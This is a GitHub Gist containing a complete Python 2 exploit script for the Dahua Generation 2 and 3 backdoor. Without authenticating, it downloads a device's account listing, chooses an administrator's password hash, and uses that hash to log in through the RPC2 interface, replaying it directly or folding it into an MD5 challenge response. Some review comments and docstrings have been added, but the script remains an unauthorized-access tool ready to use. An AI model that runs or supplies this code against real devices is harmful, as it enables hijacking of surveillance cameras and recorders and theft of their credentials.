-
-
Save interfacekun/06d9b195d5c1a122a7cfdd52eff5fd96 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
# Jacked from git history
#
import string | |
import sys | |
import socket | |
import argparse | |
import urllib, urllib2, httplib | |
import base64 | |
import ssl | |
import json | |
import commentjson # pip install commentjson | |
import hashlib | |
class HTTPconnect: | |
def __init__(self, host, proto, verbose, creds, Raw, noexploit): | |
self.host = host | |
self.proto = proto | |
self.verbose = verbose | |
self.credentials = creds | |
self.Raw = Raw | |
self.noexploit = False | |
self.noexploit = noexploit | |
def Send(self, uri, query_headers, query_data,ID): | |
self.uri = uri | |
self.query_headers = query_headers | |
self.query_data = query_data | |
self.ID = ID | |
# Connect-timeout in seconds | |
timeout = 5 | |
socket.setdefaulttimeout(timeout) | |
url = '%s://%s%s' % (self.proto, self.host, self.uri) | |
if self.verbose: | |
print "[Verbose] Sending:", url | |
if self.proto == 'https': | |
if hasattr(ssl, '_create_unverified_context'): | |
print "[i] Creating SSL Unverified Context" | |
ssl._create_default_https_context = ssl._create_unverified_context | |
if self.credentials: | |
Basic_Auth = self.credentials.split(':') | |
if self.verbose: | |
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1] | |
try: | |
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() | |
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) | |
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) | |
opener = urllib2.build_opener(auth_handler) | |
urllib2.install_opener(opener) | |
except Exception as e: | |
print "[!] Basic Auth Error:",e | |
sys.exit(1) | |
if self.noexploit and not self.verbose: | |
print "[<] 204 Not Sending!" | |
html = "Not sending any data" | |
else: | |
if self.query_data: | |
req = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers) | |
if self.ID: | |
req.add_header('DhWebClientSessionID',self.ID) | |
else: | |
req = urllib2.Request(url, None, headers=self.query_headers) | |
if self.ID: | |
req.add_header('DhWebClientSessionID',self.ID) | |
rsp = urllib2.urlopen(req) | |
# print rsp | |
if rsp: | |
print "[<] %s OK" % rsp.code | |
if self.Raw: | |
return rsp | |
else: | |
html = rsp.read() | |
return html | |
class Dahua_Backdoor:
    """Login sequences for the two device generations this script handles.

    ``Gen2`` and ``Gen3`` each take an already-fetched account listing, select
    an administrator entry from it, and then run a request-session / login /
    logout exchange through ``HTTPconnect``.

    NOTE: Python 2 only (print statements, indexing the result of dict.keys()).
    """

    def __init__(self, rhost, proto, verbose, creds, Raw, noexploit):
        """Store the connection settings that are forwarded to HTTPconnect."""
        self.rhost = rhost
        self.proto = proto
        self.verbose = verbose
        self.credentials = creds
        self.Raw = Raw
        # The next assignment is overwritten immediately by the one after it.
        self.noexploit = False
        self.noexploit = noexploit

    # Generation 2
    def Gen2(self,response,headers):
        """Run the Generation 2 login sequence.

        response -- object providing readlines(); each line is treated as a
                    ':'-separated account record
        headers  -- dict of HTTP headers passed to every request

        Returns the value HTTPconnect.Send returns for the logout request.
        """
        self.response = response
        self.headers = headers
        html = self.response.readlines()
        for line in html:
            # Skip lines that start with '#' and lines that are only a newline
            if line[0] == "#" or line[0] == "\n":
                continue
            line = line.split(':')[0:25]
            # Field 1 is used as the login name and field 2 as the password hash.
            # Preference: the first record named 'admin' or '888888', otherwise
            # the first record whose field 3 equals '1'.
            # NOTE(review): the meaning of fields 0 and 3 is not visible in
            # this file -- confirm against the device's file format.
            if line[1] == 'admin':
                print "[i] Chosing Admin Login: {}, PWD hash: {}".format(line[1],line[2])
                ADMIN = line[1]
                PWD = line[2]
                break
            elif line[1] == '888888':
                print "[i] Choosing Admin Login: {}, PWD hash: {}".format(line[1],line[2])
                ADMIN = line[1]
                PWD = line[2]
                break
            else:
                if line[3] == '1':
                    print "Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0],line[1],line[2])
                    ADMIN = line[1]
                    PWD = line[2]
                    break
        # NOTE(review): if no record matched above, ADMIN and PWD are never
        # bound and the code below raises NameError.
        #
        # Login 1
        #
        print "[>] Requesting our session ID"
        query_args = {"method":"global.login",
            "params":{
                "userName":ADMIN,
                "password":"",
                "clientType":"Web3.0"},
            "id":10000}
        URI = '/RPC2_Login'
        response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None)
        # The reply is parsed as JSON; its 'session' value is reused below
        json_obj = json.load(response)
        if self.verbose:
            print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
        #
        # Login 2
        #
        # The hash read from the listing is sent unchanged as the password,
        # with authorityType "OldDigest".
        print "[>] Logging in"
        query_args = {"method":"global.login",
            "session":json_obj['session'],
            "params":{
                "userName":ADMIN,
                "password":PWD,
                "clientType":"Web3.0",
                "authorityType":"OldDigest"},
            "id":10000}
        URI = '/RPC2_Login'
        response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,json_obj['session'])
        print response.read()
        #
        # Wrong username/password
        # { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1997483520 }
        # { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1997734656 }
        #
        # Successful login
        # { "id" : 10000, "params" : null, "result" : true, "session" : 1626533888 }
        #
        #
        # Logout
        #
        # NOTE(review): "params" is the string "null" rather than None, and the
        # session is sent only in the body (the ID argument is None here, unlike
        # the login call above) -- confirm both are intended.
        print "[>] Logging out"
        query_args = {"method":"global.logout",
            "params":"null",
            "session":json_obj['session'],
            "id":10001}
        URI = '/RPC2'
        response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None)
        return response

    # Generation 3
    def Gen3(self,response,headers):
        """Run the Generation 3 login sequence.

        response -- file-like object parsed with commentjson.load; the value
                    under its first key is iterated as a list of account dicts
                    with 'Group', 'Name', 'Password' and 'AuthorityList' keys
        headers  -- dict of HTTP headers passed to every request

        Returns the value HTTPconnect.Send returns for the logout request.
        """
        self.response = response
        self.headers = headers
        json_obj = commentjson.load(self.response)
        if self.verbose:
            print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
        # Every entry in group 'admin' overwrites the current selection; the
        # loop stops at the first such entry with at least 20 authorities.  If
        # none reaches 20, the last 'admin' entry seen stays selected.
        for who in json_obj[json_obj.keys()[0]]:
            if who['Group'] == 'admin':
                USER_NAME = who['Name']
                PWDDB_HASH = who['Password']
                AUTH_NO = len(who['AuthorityList'])
                if AUTH_NO >= 20:
                    print "[i] Choosing Admin Login: {}, Auth: {}".format(who['Name'],len(who['AuthorityList']))
                    break
        # NOTE(review): if no entry is in group 'admin', USER_NAME and
        # PWDDB_HASH are never bound and the code below raises NameError.
        #
        # Request login
        #
        print "[>] Requesting our session ID"
        query_args = {"method":"global.login",
            "params":{
                "userName":USER_NAME,
                "password":"",
                "clientType":"Web3.0"},
            "id":10000}
        URI = '/RPC2_Login'
        response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None)
        json_obj = json.load(response)
        if self.verbose:
            print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
        # The login password is the upper-cased hex MD5 of
        # "<user name>:<random value from the reply>:<hash from the listing>"
        RANDOM = json_obj['params']['random']
        PASS = ''+ USER_NAME +':' + RANDOM + ':' + PWDDB_HASH + ''
        RANDOM_HASH = hashlib.md5(PASS).hexdigest().upper()
        print "[i] Downloaded MD5 hash:",PWDDB_HASH
        print "[i] Random value to encrypt with:",RANDOM
        print "[i] Built password:",PASS
        print "[i] MD5 generated password:",RANDOM_HASH
        #
        # Login
        #
        print "[>] Logging in"
        query_args = {"method":"global.login",
            "session":json_obj['session'],
            "params":{
                "userName":USER_NAME,
                "password":RANDOM_HASH,
                "clientType":"Web3.0",
                "authorityType":"Default"},
            "id":10000}
        URI = '/RPC2_Login'
        response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,json_obj['session'])
        print response.read()
        # Wrong username/password
        # { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1156538295 }
        # { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1175812023 }
        #
        # Successful login
        # { "id" : 10000, "params" : null, "result" : true, "session" : 1175746743 }
        #
        #
        # Logout
        #
        # NOTE(review): "params" is the string "null" rather than None, and the
        # session is sent only in the body (the ID argument is None here, unlike
        # the login call above) -- confirm both are intended.
        print "[>] Logging out"
        query_args = {"method":"global.logout",
            "params":"null",
            "session":json_obj['session'],
            "id":10001}
        URI = '/RPC2'
        response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None)
        return response
# | |
# Validate correctness of HOST, IP and PORT | |
# | |
class Validate:
    """Sanity checks for a target host and port given as strings."""

    def __init__(self,verbose):
        self.verbose = verbose

    # Check if IP is valid
    def CheckIP(self,IP):
        """Return True if IP is four '.'-separated decimal numbers in 0..255."""
        self.IP = IP
        octets = self.IP.split('.')
        if len(octets) != 4:
            return False
        for octet in octets:
            if not octet.isdigit():
                return False
            try:
                value = int(octet)
            except ValueError:
                # isdigit() can accept characters that int() cannot convert
                return False
            if value < 0 or value > 255:
                return False
        return True

    # Check if PORT is valid
    def Port(self,PORT):
        """Return True if PORT converts to an integer in 1..65535, else False.

        Input that cannot be converted (e.g. 'abc', '' or None) is reported
        as invalid instead of raising.
        """
        self.PORT = PORT
        try:
            port = int(self.PORT)
        except (TypeError, ValueError):
            return False
        return 1 <= port <= 65535

    # Check if HOST is valid
    def Host(self,HOST):
        """Return HOST as an IPv4 address string, or False if it is not usable.

        A value accepted by socket.inet_aton must also pass CheckIP (inet_aton
        alone accepts short forms such as '127.1').  Anything inet_aton rejects
        is looked up with socket.gethostbyname and the resolved address is
        returned; a failed lookup yields False.
        """
        self.HOST = HOST
        try:
            # Raises socket.error for DNS names and for invalid addresses
            socket.inet_aton(self.HOST)
        except socket.error:
            # Not an address: try it as a DNS name and use the IP address
            try:
                self.HOST = socket.gethostbyname(self.HOST)
                return self.HOST
            except socket.error:
                return False
        # Now check that it is a fully written dotted quad
        if self.CheckIP(self.HOST):
            return self.HOST
        return False
# Script entry point: parse the command line, validate the target, probe which
# account-listing URI the target serves, and run the matching login sequence.
if __name__ == '__main__':
    #
    # Help, info and pre-defined values
    #
    INFO = '[Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]\n'
    HTTP = "http"
    HTTPS = "https"
    proto = HTTP
    verbose = False
    noexploit = False
    raw_request = True
    rhost = '192.168.5.2' # Default Remote HOST
    rport = '80' # Default Remote PORT
    # creds = 'root:pass'
    # NOTE(review): with creds left as False the --auth option below is never
    # registered, so Basic Auth can only be enabled by editing this line.
    creds = False
    #
    # Try to parse all arguments
    #
    try:
        arg_parser = argparse.ArgumentParser(
            prog=sys.argv[0],
            description=('[*] '+ INFO +' [*]'))
        arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
        arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
        if creds:
            arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
        arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
        arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
        arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
        args = arg_parser.parse_args()
    except Exception as e:
        print INFO,"\nError: %s\n" % str(e)
        sys.exit(1)
    # We want at least one argument, so print out help
    # (argparse prints the help text and exits when given '-h')
    if len(sys.argv) == 1:
        arg_parser.parse_args(['-h'])
    print "\n[*]",INFO
    if args.verbose:
        verbose = args.verbose
    #
    # Check validity, update if needed, of provided options
    #
    if args.https:
        proto = HTTPS
        # Default to port 443 for HTTPS unless a port was given explicitly
        if not args.rport:
            rport = '443'
    # args.auth only exists when creds was truthy at parser set-up, hence the guard
    if creds and args.auth:
        creds = args.auth
    if args.noexploit:
        noexploit = args.noexploit
    if args.rport:
        rport = args.rport
    if args.rhost:
        rhost = args.rhost
    # Check if RPORT is valid
    if not Validate(verbose).Port(rport):
        print "[!] Invalid RPORT - Choose between 1 and 65535"
        sys.exit(1)
    # Check if RHOST is valid IP or FQDN, get IP back
    rhost = Validate(verbose).Host(rhost)
    if not rhost:
        print "[!] Invalid RHOST"
        sys.exit(1)
    #
    # Validation done, start print out stuff to the user
    #
    if noexploit:
        print "[i] Test mode selected, no exploiting..."
    if args.https:
        print "[i] HTTPS / SSL Mode Selected"
    print "[i] Remote target IP:",rhost
    print "[i] Remote target PORT:",rport
    # print "[i] Connect back IP:",lhost
    # print "[i] Connect back PORT:",lport
    # From here on rhost is "address:port", the form HTTPconnect puts in the URL
    rhost = rhost + ':' + rport
    headers = {
        'Connection': 'close',
        'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
        'Accept' : '*/*',
        'X-Requested-With' : 'XMLHttpRequest',
        'X-Request' : 'JSON',
        'User-Agent':'Mozilla/5.0',
        }
    # Probe order: /current_config/passwd first (handled by Gen2); on HTTP 404
    # fall back to /current_config/Account1 (handled by Gen3).
    try:
        print "[>] Checking for backdoor version"
        URI = "/current_config/passwd"
        response = HTTPconnect(rhost,proto,verbose,creds,raw_request,noexploit).Send(URI,headers,None,None)
        print "[!] Generation 2 found"
        # NOTE(review): 'reponse' looks like a typo for 'response'; the value
        # is not used afterwards either way.
        reponse = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request,noexploit).Gen2(response,headers)
    except urllib2.HTTPError as e:
        # NOTE(review): an HTTP error other than 404 on the first probe is
        # ignored here, and the script goes on to print "All done" and exit 0.
        if e.code == 404:
            # NOTE(review): this inner try sits inside an except handler, so the
            # sibling "except Exception" below does not cover it; anything other
            # than HTTPError raised here propagates as a traceback.
            try:
                URI = '/current_config/Account1'
                response = HTTPconnect(rhost,proto,verbose,creds,raw_request,noexploit).Send(URI,headers,None,None)
                print "[!] Generation 3 Found"
                response = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request,noexploit).Gen3(response,headers)
            except urllib2.HTTPError as e:
                if e.code == 404:
                    print "[!] Seems not to be Dahua device! ({})".format(e.code)
                    sys.exit(1)
                else:
                    # Reported, but execution still continues to "All done"
                    print "Error Code: {}".format(e.code)
    except Exception as e:
        print "[!] Detect of target failed (%s)" % e
        sys.exit(1)
    print "\n[*] All done...\n"
    sys.exit(0)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment